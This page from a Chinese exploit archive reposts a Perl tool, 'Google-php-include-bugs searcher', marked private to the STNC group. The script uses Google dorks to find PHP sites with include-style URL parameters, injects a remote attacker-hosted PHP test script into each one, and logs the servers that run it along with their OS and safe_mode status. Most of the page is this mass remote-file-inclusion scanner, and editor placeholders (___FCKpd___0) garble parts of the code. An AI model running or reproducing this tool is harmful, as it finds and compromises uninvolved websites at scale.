首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Google-php-include-bugs searcher v 0.8
来源:www.security-teams.net 作者:drmist 发布时间:2008-10-23  
perl 
 
# ================================================================ # 
#          Google-php-include-bugs searcher v 0.8                  # 
#                          (c)oded by drmist\STNC                  # 
#                          www.security-teams.net                  # 
#                                                                  # 
#                 ATTENTION. THIS SCRIPT IS PRIVATE.               # 
#              ONLY FOR STNC AND FRIENDS. NOT FOR SALE.            # 
#                                                                  # 
#  Usage: perl script.pl --log=<log-file> --url=<test-script-url>  # 
#  Test script:                                                    # 
#  <?php                                                           # 
#  error_reporting(0);                                             # 
#  $s = md5("STNC");                                               # 
#  $code = eregi("windows", php_uname())+                          # 
#  2*eregi("apache", getenv("SERVER_SOFTWARE"))+                   # 
#  4*ini_get('safe_mode'); echo $s."[$code]".$s;                   # 
#  ?>                                                              # 
# ================================================================ # 
 
use IO::Socket; 
 
@inc_bugs = ("page", "text", "print", "html", "url", "view", "show", "body", "cat", 
            "inc", "incl", "include", "read", "write", "data", "code", "fname", 
     "filename", "cont", "content", "menu", "open", "file", "id", "p", "f", 
     "seite", "pagina", "vista", "vue", "visao", "datei", "offnen", "corpo", 
     "corps", "ouvrir", "fichier", "abrir", "fichero", "inhalt", "contenu", 
     "conteudo"); 
 
@zones = ("au", "com", "net", "org", "de", "fr", "uk", "br", "am", 
         "info", "name", "aero", "biz", "edu", "ws", "in", 
  "cn", "us", "be", "it", "cc", "tv", "ru", "su", 
  "jp", "kz", "se", "is", "ca", "gs", "ms", "vg", 
  "be", "fi", "gov"); 
 
@ftypes = ("php", "php3"); 
 
$boundary = "ca73bad132fa0c99fe9ce9efe9029e21"; # md5("STNC"); 
 
for($i = 0; $i < @ARGV; $i++) 
{ 
 if($ARGV[$i] =~ /^--log=(.*)$/) { $log = $1; } 
 elsif($ARGV[$i] =~ /^--url=(.*)$/) {$script = $1; } 
} 
 
if(!($script && $log)){ usage(); exit; } 
 
foreach $inc(@inc_bugs) 
{ 
 foreach $zone(@zones) 
 { 
   foreach $ftype(@ftypes) 
   { 
     $request = "filetype:$ftype site:$zone inurl:$inc="; 
     print "\n[$request]\n"; 
 
     $request =~ s/(.)/sprintf("%%%02x",ord($1))/eg; 
     @dn = (); 
 
     for($i = 0;$i < 10; $i++) 
     { 
       @temp = get("http://www.google.com/search?filter=0&num=100&start=".$i. 
        "00&q=$request")  =~ /(http\:\/\/[a-z0-9\.\-\/\?\:\&\%\=\_]{5,})/gi; 
       foreach $url (@temp) 
{ 
  if($url !~ /($inc=[^\&]+)/i) { next; } 
  $left = 
; $right = 
; if($url =~ /https?\:\/\/[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\/search\?q=cache:/i){ next; } if($url =~ /google\.com/i){ next; } ($domain) = $url =~ /^http\:\/\/([a-z0-9\.\-]{5,})/; if($domain =~ /^www\.(.+)$/) { $domain = $1; } $f=0;foreach(@dn){if(
___FCKpd___0
eq $domain){$f++;last;}}if($f){next;} push @dn, $domain; $print = "$left$inc=[INCLUDE]$right"; if(($data) = get("$left$inc=$script\?$right") =~ /$boundary\[([0-9]+)\]$boundary/i) { $s = "$print - ".(($data % 2) ? "WINDOWS" : "UNIX").(($data > 3) ? ", SAFE_MODE" : "")."\n"; $count++; print "[$count] $s"; open LOG, ">>$log"; print LOG $s; close LOG; } else { print "$print - no bugs\n"; } } } } } } sub timeout() { close $sock; } sub get() { local $request =
___FCKpd___0
[0]; local $port = 80; local $data = ""; if(local($server, $url) = $request =~ /^http\:\/\/([^\/]+)\/(.+)$/) { if($server =~ /^([^\:]+)\:([0-9]{2,5})$/){ $server = $1; $port = $2; } $sock = IO::Socket::INET->new( PeerAddr => $server, PeerPort => $port, Proto => 'tcp', Type => SOCK_STREAM, TimeOut => $timeout ) or return 0; # connection failed print $sock "GET /$url HTTP/1.0\r\nHost: $server\r\n\r\n"; $SIG{ALRM} = \&timeout; alarm 10; while(<$sock>){ $data .=
___FCKpd___0
; } alarm 0; close $sock; } return $data; } sub usage() { print qq(Usage: perl $0 --log=<log-file> --url=<url-of-test-script-source> Test script: <?php error_reporting(0); \$s = md5("STNC"); \$code = eregi("windows", php_uname())+ 2*eregi("apache", getenv("SERVER_SOFTWARE"))+ 4*ini_get('safe_mode'); echo \$s."[\$code]".\$s; ?> ); }

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·freeSSHd 1.2.1 sftp rename Rem
·Opera <= 9.60 Stored Cross Sit
·VLC Media Player TY File Stack
·FreeSSH version 1.2.1 denial o
·GoodTech SSH (SSH_FXP_OPEN) Re
·LibSPF2 < 1.2.8 DNS TXT Record
·Dart Communications PowerTCP F
·LoudBlog <= 0.8.0a (ajax.php)
·Exploits Asterisk 1.4,1.6 et.
·Opera 9.52/9.60 Stored Cross S
·CSPartner 1.0 (Delete All User
·e107 <= 0.7.13 (user_hidden_fi
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved